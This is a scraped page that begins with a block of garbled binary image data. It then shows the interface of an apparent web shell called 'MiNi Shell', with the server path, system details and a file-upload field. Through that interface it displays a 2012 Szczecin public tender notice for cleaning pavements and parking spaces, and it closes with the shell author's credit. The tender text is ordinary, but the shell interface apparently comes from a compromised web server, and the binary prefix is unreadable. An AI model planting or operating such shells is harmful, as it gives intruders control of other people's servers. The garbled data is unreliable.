JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121010/215419-N-2012.html

<p class="kh_header"><b>Szczecin: Oczyszczanie chodników i miejsc parkingowych położonych  w strefie płatnego parkowania</b><br>
<b>Numer ogłoszenia: 215419 - 2012; data zamieszczenia: 10.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Szczecin - Zarząd Dróg i Transportu Miejskiego , ul. Klonowica 5, 71-241 Szczecin, woj. zachodniopomorskie, tel. 91 4800444,4800434, faks 91 4393003, 4800453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zditm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oczyszczanie chodników i miejsc parkingowych położonych  w strefie płatnego parkowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)  Oczyszczaniu  podlegają chodniki i parkingi o łącznej powierzchni 73 942 m2: 
2)  Utrzymanie czystości dotyczy:
a)  całej szerokości chodnika, wraz z miejscami parkingowymi wbudowanymi w chodnik, od granicy posesji graniczącej z przyległym chodnikiem, na którym dopuszczony jest płatny postój lub parkowanie pojazdów (w całości lub częściowo) do krawędzi jezdni wraz z rynsztokiem przyległym do chodnika z wyłączeniem:
-powierzchni chodników na długości stanowisk rezerwowanych na potrzeby instytucji,   zakładów pracy, przystanki komunikacji miejskiej itp.,
-powierzchni na szerokości wjazdów do bram, dróg dojazdowych na tereny instytucji lub obiektów prywatnych oraz tzw. narożników,
-powierzchni stanowiących zajęcie pod różnorodne formy geometryczne infrastruktury technicznej, wysepki rozdzielcze stanowisk postojowych, zieleńców, koszy ulicznych itp.
b) całej powierzchni miejsc parkingowych położonych w pasie drogowym poza chodnikiem.
3)  Przez oczyszczanie chodników i miejsc parkingowych rozumie się zamiatanie i zbieranie wszelkich odpadów tj. w szczególności papierów, niedopałków papierosowych, pozostałości opakowań papierowych, szklanych, foliowych, metalowych, szmat, drewna i drobnych gałęzi, porzuconych worków ze śmieciami, śmieci przyczepionych do drzew i krzewów, piasku lub zalegającej ziemi, liści i owoców opadłych z drzew i krzewów, odchodów zwierzęcych i ich wywóz, odchwaszczanie, usuwanie trawy, a w okresie opadów śniegu i wystąpienia gołoledzi  rozumie się usuwanie śniegu, błota pośniegowego i likwidację gołoledzi. Brak widocznych efektów będzie traktowane jako nienależyte realizowanie zadania. 
4.  Wykonawca zobowiązuje się do:
1) zapewnienia w okresie opadu śniegu i gołoledzi odpowiednią ilość osób do ręcznego oczyszczania chodników i miejsc  parkingowych w SPP, by zapewnić prawidłową realizację warunków umowy;
2) wywiązywania się z nałożonych obowiązków codziennie (nie wyłączając sobót, niedziel i  świąt) do godziny 08:00; Brak widocznych efektów sprzątania po tej godzinie będzie traktowane jako nienależyte  realizowanie zadania.
5. Podczas opadów śniegu, winien on być odgarniany po każdym opadzie do uzyskania czystej nawierzchni celem niedopuszczenia do powstania nierówności ze zlodowaciałego śniegu i pryzmowany (utworzenie pryzm w odległości do 10 m od przejścia dla pieszych lub w przypadku dużej ilości miejsc parkingowych w jednym ciągu także na co siódmym miejscu parkingowym, z zachowaniem możliwości bezpiecznej wymiany pojazdów na miejscach parkingowych. Wysokość pryzmy przy skrzyżowaniu nie może być wyższa niż 1 m. 
W przypadku dużych opadów śniegu pryzmy muszą być tworzone na miejscach parkingowych na jezdni w taki sposób aby nie zajmowały miejsc parkingowych częściej niż co 7 miejsce parkingowe. Szerokość pryzmy nie powinna być mniejsza niż 3,5 m oraz wyższa niż 1,2 m. Dopuszcza się tworzenie pryzm na polach martwych. Niedopuszczalne jest pryzmowanie śniegu w miejsca w których znajdują się, studzienki kanalizacyjne, znaki drogowe, kosze uliczne, zapory uniemożliwiające parkowanie, bramy wjazdowe, miejsca dla osób niepełnosprawnych.
6.W okresach bezopadowych śnieg i błoto pośniegowe nanoszone przez pojazdy na miejsca postojowe oraz przez pojazdy pługujące na strefę przykrawężnikową (rynsztok) winny być usuwane na bieżąco.
7.Podczas gołoledzi chodniki winny być posypywane przy użyciu dostępnych środków uszorstniających, zgodnych z Rozporządzeniem Ministra Środowiska z dnia 27 października 2005 r. w sprawie rodzajów i warunków stosowania środków, jakie mogą być używane na drogach publicznych oraz ulicach i placach (Dz. U. 230 poz. 1960 z dnia 24.11.2005 r.).
8.Efekty likwidacji gołoledzi, odgarniania śniegu i błota pośniegowego winny być widoczne w czasie nie dłuższym niż 4 godziny od momentu ich wystąpienia.
9.Wszystkie chodniki i miejsca parkingowe znajdujące się w SPP muszą być oczyszczone w nieprzekraczalnym czasie 24 godzin od ustania opadów śniegu.
10.Zamawiający zastrzega sobie prawo kontroli realizacji zadania bez współuczestnictwa Wykonawcy. Kontrola winna być potwierdzona stosownym protokołem oraz w przypadku stwierdzenia nieprawidłowości dokumentacją fotograficzną.
11.Zamawiający zastrzega sobie prawo zgłoszenia zanieczyszczenia po godzinie sprzątania. Wykonawca zobowiązany będzie do jego uprzątnięcia w terminie 1 godziny od chwili zgłoszenia. Zlecenie to będzie określane jako zlecenie dodatkowe zwane zleceniem interwencyjnym i nie będzie powodowało zwiększenia ryczałtowego miesięcznego wynagrodzenia brutto.
12.Kontrole mogą być prowadzone codziennie nie wyłączając sobót, niedziel i świąt:
- po godzinie 08:00;
- w czasie wystąpienia opadów śniegu lub gołoledzi  4 godziny po ich wystąpieniu.
13. Brak widocznych efektów likwidacji gołoledzi, odgarniania śniegu i błota pośniegowego po tym czasie będzie traktowane jako nienależyte realizowanie przedmiotu umowy.
14. Zamawiający zastrzega sobie prawo zwiększenia lub zmniejszenia wielkości oczyszczanych chodników i parkingów do 10 % wielkości wymienionych w załączniku nr 6 do niniejszej SIWZ. Zwiększenie bądź zmniejszenie zamówienia podstawowego spowoduje zwiększenie lub zmniejszenie  kwoty ryczałtu miesięcznego brutto o uśrednioną kwotę  1 m2 razy zwiększony lub zmniejszony obmiar.
15. Wykonawca w ciągu 14 dni od dnia podpisania umowy przedstawi Zamawiającemu do uzgodnienia -  wykaz kolejności oczyszczania chodników i parkingów w SPP wraz z ilością osób skierowanych do realizacji przedmiotu zamówienia. Dodatkowo Wykonawca musi poinformować Zamawiającego na każde jego żądanie o ilości osób sprzątających SPP.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.61.10.00-3, 90.61.20.00-0, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości 10 000 zł (słownie złotych: dziesięć tysięcy i 00/100) w terminie do dnia 18.10.2012 r. do godziny 09:30. 
     Decyduje data i godzina wpływu środków do zamawiającego.
2.	Wadium może być wnoszone:
1)	w pieniądzu - przelewem na konto ZDiTM w banku PEKAO SA I ODDZIAŁ w Szczecinie nr rachunku 83 1240 3813 1111 0000 4384 4416,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości - w kasie ZDiTM, pokój nr 19 na parterze</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) zezwolenie na prowadzenie działalności w zakresie zbierania odpadów wymagane na podstawie art. 28 ustawy z dnia 27 kwietnia 2001r. o odpadach (tekst jedn. Dz.U. z 2010 r. nr 185 poz. 1243 z późn.zm.),
b) zezwolenie na prowadzenie działalności w zakresie transportu odpadów wymagane na podstawie art. 28 ustawy z dnia 27 kwietnia 2001r. o odpadach (tekst jedn. Dz.U. z 2010 r. nr 185 poz. 1243 z późn.zm.);
NA ZASADZIE SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonali należycie (a w przypadku świadczeń okresowych lub ciągłych również wykonują) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną usługę podobną do objętych przedmiotem zamówienia o wartości nie mniejszej 300 000,00 zł brutto. Za usługi podobne zamawiający uzna sprzątanie chodników, ulic, parkingów oraz placów;
NA ZASADZIE SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.	Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	Ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
w przypadku składania oferty wspólnej należy złożyć jeden dokument;
2)	Odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz);
3)	Oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
w przypadku składania oferty wspólnej należy złożyć jeden dokument.
4)	Oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące, że wykonawca podczas realizacji zamówienia postępował będzie w sposób zgodny z zasadami gospodarowania odpadami oraz wymogami ochrony środowiska, określonymi w ustawie z dnia 27 kwietnia 2001r. Prawo ochrony środowiska (tekst jedn. Dz.U. z 2008 r. nr 25 poz. 150 z póź. zm.) oraz w  ustawie z dnia 27 kwietnia 2001 r. o odpadach (tekst jedn. Dz.U. z 2010 r. nr 185 poz. 1243 z póź.zm.) a także w aktach wykonawczych do ww. ustaw.
     W przypadku składania oferty wspólnej należy złożyć jeden dokument.
5)   Oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, że wykonawca zobowiązuje się do zapewnienia w okresie opadów śniegu i gołoledzi odpowiednią ilość osób do ręcznego oczyszczania chodników i miejsc  parkingowych w SPP, by zapewnić prawidłową realizację warunków umowy.
 W przypadku składania oferty wspólnej należy złożyć jeden dokument.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zmiana postanowień niniejszej umowy może nastąpić wyłącznie w sytuacji, gdy:
1)	wystąpi konieczność zmiany kadry przewidzianej do realizacji umowy, bądź zmiany konta bankowego Wykonawcy,
2)	wystąpi konieczność wykonania usług zamiennych, które nie powodują wykroczenia poza przedmiot zamówienia, a jedynie nastąpi zmiana sposobu wykonania jakiegoś elementu usług,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zditm.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarzad Dróg i Transportu Miejskiego
ul. Klonowica 5, 71-241 Szczecin, III piętro pok. 305,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2012 godzina 09:30, miejsce: Zarzad Dróg i Transportu Miejskiego
ul. Klonowica 5, 71-241 Szczecin, III piętro - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com